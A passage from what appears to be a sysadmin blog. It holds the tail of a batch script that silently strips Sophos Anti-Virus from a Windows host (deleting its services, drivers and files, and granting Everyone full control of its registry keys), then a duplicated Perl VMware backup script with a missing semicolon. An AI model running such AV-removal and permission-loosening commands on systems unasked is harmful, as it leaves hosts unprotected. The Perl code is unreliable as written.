regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavNeutralRes.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavRes.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResChs.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResCht.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResDeu.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResEng.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResEsp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResFra.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResIt.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResJap.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavShellExt.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanEditExports.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanEditFacade.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Security.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SIPSManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SophtainerAdapter.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SystemInformation.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ThreatDetection.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ThreatManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Translators.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\veex.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\VirusDetection.dll"
REM === SAV 4.x DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ACCESSDT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\DESKRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ELOGRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICHKRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICMONRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICNTSYS.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICSTAT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\MEADAPTER.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\NMSGRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\OSDP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVI.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVIREG.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVMSCM.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SHRDRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SMTPRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPPP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPWRAP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWEEPNT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWOUTPUT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWOUTRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\VEEX.DLL"
REM === Sophos AutoUpdate DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\AUAdapter.dll"
::regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\boost_date_time-vc71-mt-1_32.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ChannelUpdater.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\cidsync.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\config.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\crypto.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\EECustomActions.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\inetconn.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\InstlMgr.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ispsheet.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\libcurl.dll"
::regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\libeay32.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\Logger.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\retailer.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\SAUConfigDLL.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\swlocale.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmlcpp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmlparse.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmltok.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALMon.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALsvc.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALUpdate.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\AUAdapter.exe"
ECHO Completed.
ECHO.
ECHO Deleting Sophos Services...
"%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavService.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavAdminService.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\ManagementAgentNT.exe" -uninstall >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\AutoUpdateAgentNT.exe" -uninstall >NUL 2>NUL
"%PROGRAMFILES%\Sophos\AutoUpdate\ALSvc.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\AutoUpdate\ALMon.exe" /UnRegServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\RouterNT.exe" -uninstall >NUL 2>NUL
sc delete sweepupdate >NUL 2>NUL
sc delete sweepnet >NUL 2>NUL
ECHO Completed.
Echo.
ECHO Removing Sophos Installed Files...
RD /S /Q "%PROGRAMFILES%\SOPHOS\AutoUpdate" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\Sophos Anti-Virus" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\Remote Management System" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Sophos" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos" >NUL 2>NUL
RD /s /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos" >NUL 2>NUL
RD /s /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos Anto-Virus" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Application Data\Sophos" >NUL 2>NUL
RD /S /Q "%USERPROFILE%\Application Data\Sophos" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{09C6BF52-6DBA-4A97-9939-B6C24E4738BF}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{15C418EB-7675-42be-B2B3-281952DA014D}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{C12953C2-4F15-4A6C-91BC-511B96AE2775}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{FF11005D-CBC8-45D5-A288-25C7BB304121}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{034759DA-E21A-4795-BFB3-C66D17FAD183}" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\Drivers\savonaccesscontrol.sys" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\Drivers\savonaccessfilter.sys" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\drivers\savonaccess.sys" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS Sweep for NT" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\InterCheck Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\Remote Update Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos\Remote Update Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%USERSPROFILE%\Start Menu\Programs\Startup\Remote Update Monitor.lnk" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\Sophos\Remote Update" >NUL 2>NUL
ECHO Completed.
REM === Remove the typical Sophos account/groups for Sophos AutoUpdate ===
ECHO.
ECHO Removing Sophos Accounts and Groups...
Net user SophosSAU%COMPUTERNAME%0 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%1 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%2 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%3 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%4 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%5 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%6 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%7 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%8 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%9 /DELETE >NUL 2>NUL
Net localgroup SophosAdministrator /DELETE >NUL 2> NUL
Net localgroup SophosOnAccess /DELETE >NUL 2> NUL
Net localgroup SophosPowerUser /DELETE >NUL 2> NUL
Net localgroup SophosUser /DELETE >NUL 2> NUL
ECHO Completed.
ECHO Changing Permissions on Sophos...
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0000 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0001 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0002 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0003 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0004 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0005 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0006 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0007 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0008 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0009 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000a /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000b /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000c /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000d /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000e /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-Adapter /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-Info /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SavAdminService /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus Daily" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus InterCheck" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Inetconn.Connection /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Products /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Service /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System\CertificationIdentityKeys /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System\Router /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System\CertificationIdentityKeys /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System\ManagementAgent /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Application /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Components /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\PP /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\SAVUI /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Status /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\UpdateStatus /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Classes /GRANT=Administrators=F >NUL 2>NUL
ECHO Completed.
Echo.
ECHO Deleting SAVI...
REG DELETE HKLM\Software\Sophos\SAVI /F > NUL 2> NUL
ECHO REGEDIT4 > %TEMP%\SOSAVI.REG
ECHO. >> %TEMP%\SOSAVI.REG
ECHO [-HKEY_LOCAL_MACHINE\Software\Sophos\SAVI] >> %TEMP%\SOSAVI.REG
REGEDIT /S %TEMP%\SOSAVI.REG >NUL 2>NUL
ECHO Completed.
Echo.
ECHO Removing Sophos Registry Keys...
SC create SopReg binpath= "cmd /K START /WAIT REGEDIT /S %TEMP%\SOTMP.REG" type= own type= interact > NUL
sc start "SopReg" > NUL
sc delete "SopReg" > NUL
REGEDIT /S %TEMP%\SOTMP.REG >NUL 2>NUL
ECHO Completed.
ECHO.
ECHO Checking for Microsoft Vista (2)...
ver|find "Version 6.0" >NUL
if %errorlevel% equ 0 (
Echo.
Echo Found: Changing UAC back to alert mode...
ECHO REGEDIT4 > %temp%\sopuac.reg
ECHO. >> %temp%\sopuac.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %temp%\sopuac.reg
ECHO "ConsentPromptBehaviorAdmin"=dword:00000002 >> %temp%\sopuac.reg
regedit /S %temp%\sopuac.reg >NUL 2>NUL
ECHO Completed.
) ELSE (Echo Microsoft Vista not found.)
REM === Deletes Temp files ===
DEL /F /Q %TEMP%\SOTMP.REG >NUL 2>NUL
DEL /F /Q %TEMP%\SOPUAC.REG >NUL 2>NUL
DEL /F /Q %TEMP%\SOSAVI.REG >NUL 2>NUL
ECHO.
ECHO ====================================================
ECHO Script Completed.
ECHO.
ECHO please reboot the computer and run this script again
ECHO to remove files that may currently be in use.
ECHO ====================================================
Echo.
Pause
EXIT
Sunday, June 28, 2009
VMware Backup Script
#############################################################################
#Backup VM Images
#06-05-2009
#
#Important:
# When restoring VM, ensure you restart the VM Machine
#
# *****Script IS CASE SENSITIVE*******
#############################################################################
my $url = "https://ipaddress:443/sdk/vimService "; #URL to your ESX Host
my $username = "root"; #Username
my $password = "PASSWORD"; #User password
my $snapshotname = "BackupSnap"; #Name of your Snapshot
my $DSPath = "[Store]"; #Datastore name on ESX Host, example [Store]
my @VMNames;
$VMNames[0] = "SERVERNAME"; #List your VM's - CASE SENSITIVE ***
$VMNames[1] = "SERVERNAME2";
$VMNames[2] = "SERVERNAME3";
#$VMNames[3] = "";
#$VMNames[4] = "";
#$VMNames[5] = "";
#$VMNames[6] = "";
#$VMNames[7] = "";
#$VMNames[8] = "";
#$VMNames[9] = "";
my $RCLIPath = "C:/Progra~1/VMware/VMWARE~1"; #VI Remote CLI Path (Windows: Use ONLY Short Folder Names!!!!)
my $DestPath = "X:/"; #Destination Path you like to copy to (Windows: Use ONLY Short Folder Names!!!!)
#IMPORTANT!!! -- Under DestPath must exist the VMNames Folder
#(For Example if your VMNames[0] = "ServerA" and your DestPath = "D:/": D:/ServerA/)
#--------------------------------------------------------
#call the sub function (at the bottom)
&actualtime();
print " ***** Script Start *************************\n\n";
&actualtime();
print " ----- Create Snapshots of running VM's -----";
print "\n\n";
system("perl $RCLIPath/Perl/apps/vm/snapshotmanager.pl --url $url --username $username --password $password --operation create --powerstatus poweredOn --snapshotname $snapshotname");
print "\n\n";
&actualtime();
print " ----- Copy VM files to local storage -----";
print "\n\n";
my $i = 0;
#special loop for arrays. run as long the array has data
foreach (@VMNames)
{
#read all available files and save filenames in the cache-array
my @cache = `perl $RCLIPath/bin/vifs.pl --url $url --username $username --password $password --dir \"$DSPath $VMNames[$i]\"`;
#run as long the cache array has data and save the value everytime in $filename
foreach my $filename (@cache)
{
#exclude uninterresting files from backup to save backup space
if($filename !~ /.log/ && $filename !~ /.vswp/ && $filename !~ /.vmsn/ && $filename !~ /-delta/)
{
#remove the "\n" at the end of $filename to prevent a error massage in log
chomp($filename)
&actualtime();
print " ----- Copy File: ";
print $filename;
#get files from VM Datastore to a local Storage
system("perl $RCLIPath/bin/vifs.pl --url $url --username $username --password $password --get \"$DSPath $VMNames[$i]/$filename\" \"$DestPath$VMNames[$i]/$filename\"");
print "\n";
}
}
$i++;
}
print "\n\n";
&actualtime();
print " ----- Remove Snapshots of running VM's -----";
print "\n\n";
system("perl $RCLIPath/Perl/apps/vm/snapshotmanager.pl --url $url --username $username --password $password --operation remove --powerstatus poweredOn --snapshotname $snapshotname --children 1");
print "\n\n";
&actualtime();
print " ***** Script End ***************************";
#sub function to print the actual time in the log
sub actualtime
{
my ($Sekunden, $Minuten, $Stunden, $Monatstag, $Monat,
$Jahr, $Wochentag, $Jahrestag, $Sommerzeit) = localtime(time);
my $CTIME_String = localtime(time);
$Monat+=1;
$Jahrestag+=1;
$Monat = $Monat < 10 ? $Monat = "0".$Monat : $Monat;
$Monatstag = $Monatstag < 10 ? $Monatstag = "0".$Monatstag : $Monatstag;
$Stunden = $Stunden < 10 ? $Stunden = "0".$Stunden : $Stunden;
$Minuten = $Minuten < 10 ? $Minuten = "0".$Minuten : $Minuten;
$Sekunden = $Sekunden < 10 ? $Sekunden = "0".$Sekunden : $Sekunden;
$Jahr+=1900;
print "$Jahr-$Monat-$Monatstag $Stunden:$Minuten:$Sekunden";
}
#Backup VM Images
#06-05-2009
#
#Important:
# When restoring VM, ensure you restart the VM Machine
#
# *****Script IS CASE SENSITIVE*******
#############################################################################
my $url = "https://ipaddress:443/sdk/vimService "; #URL to your ESX Host
my $username = "root"; #Username
my $password = "PASSWORD"; #User password
my $snapshotname = "BackupSnap"; #Name of your Snapshot
my $DSPath = "[Store]"; #Datastore name on ESX Host, example [Store]
my @VMNames;
$VMNames[0] = "SERVERNAME"; #List your VM's - CASE SENSITIVE ***
$VMNames[1] = "SERVERNAME2";
$VMNames[2] = "SERVERNAME3";
#$VMNames[3] = "";
#$VMNames[4] = "";
#$VMNames[5] = "";
#$VMNames[6] = "";
#$VMNames[7] = "";
#$VMNames[8] = "";
#$VMNames[9] = "";
my $RCLIPath = "C:/Progra~1/VMware/VMWARE~1"; #VI Remote CLI Path (Windows: Use ONLY Short Folder Names!!!!)
my $DestPath = "X:/"; #Destination Path you like to copy to (Windows: Use ONLY Short Folder Names!!!!)
#IMPORTANT!!! -- Under DestPath must exist the VMNames Folder
#(For Example if your VMNames[0] = "ServerA" and your DestPath = "D:/": D:/ServerA/)
#--------------------------------------------------------
#call the sub function (at the bottom)
&actualtime();
print " ***** Script Start *************************\n\n";
&actualtime();
print " ----- Create Snapshots of running VM's -----";
print "\n\n";
system("perl $RCLIPath/Perl/apps/vm/snapshotmanager.pl --url $url --username $username --password $password --operation create --powerstatus poweredOn --snapshotname $snapshotname");
print "\n\n";
&actualtime();
print " ----- Copy VM files to local storage -----";
print "\n\n";
my $i = 0;
#special loop for arrays. run as long the array has data
foreach (@VMNames)
{
#read all available files and save filenames in the cache-array
my @cache = `perl $RCLIPath/bin/vifs.pl --url $url --username $username --password $password --dir \"$DSPath $VMNames[$i]\"`;
#run as long the cache array has data and save the value everytime in $filename
foreach my $filename (@cache)
{
#exclude uninterresting files from backup to save backup space
if($filename !~ /.log/ && $filename !~ /.vswp/ && $filename !~ /.vmsn/ && $filename !~ /-delta/)
{
#remove the "\n" at the end of $filename to prevent a error massage in log
chomp($filename)
&actualtime();
print " ----- Copy File: ";
print $filename;
#get files from VM Datastore to a local Storage
system("perl $RCLIPath/bin/vifs.pl --url $url --username $username --password $password --get \"$DSPath $VMNames[$i]/$filename\" \"$DestPath$VMNames[$i]/$filename\"");
print "\n";
}
}
$i++;
}
print "\n\n";
&actualtime();
print " ----- Remove Snapshots of running VM's -----";
print "\n\n";
system("perl $RCLIPath/Perl/apps/vm/snapshotmanager.pl --url $url --username $username --password $password --operation remove --powerstatus poweredOn --snapshotname $snapshotname --children 1");
print "\n\n";
&actualtime();
print " ***** Script End ***************************";
#sub function to print the actual time in the log
sub actualtime
{
my ($Sekunden, $Minuten, $Stunden, $Monatstag, $Monat,
$Jahr, $Wochentag, $Jahrestag, $Sommerzeit) = localtime(time);
my $CTIME_String = localtime(time);
$Monat+=1;
$Jahrestag+=1;
$Monat = $Monat < 10 ? $Monat = "0".$Monat : $Monat;
$Monatstag = $Monatstag < 10 ? $Monatstag = "0".$Monatstag : $Monatstag;
$Stunden = $Stunden < 10 ? $Stunden = "0".$Stunden : $Stunden;
$Minuten = $Minuten < 10 ? $Minuten = "0".$Minuten : $Minuten;
$Sekunden = $Sekunden < 10 ? $Sekunden = "0".$Sekunden : $Sekunden;
$Jahr+=1900;
print "$Jahr-$Monat-$Monatstag $Stunden:$Minuten:$Sekunden";
}
Monday, June 22, 2009
SQL SERVER DATABASE SECURITY & USER REVIEW
Following pasted into a Batch file will extract information from SQL Database
You need to have SA priveledges to the SQL Dbase to run.
--->START SCRIPT<---
REM Replace % Server_Name % with ServerName
REM Replace % OUTPUT_PATH % with Output location
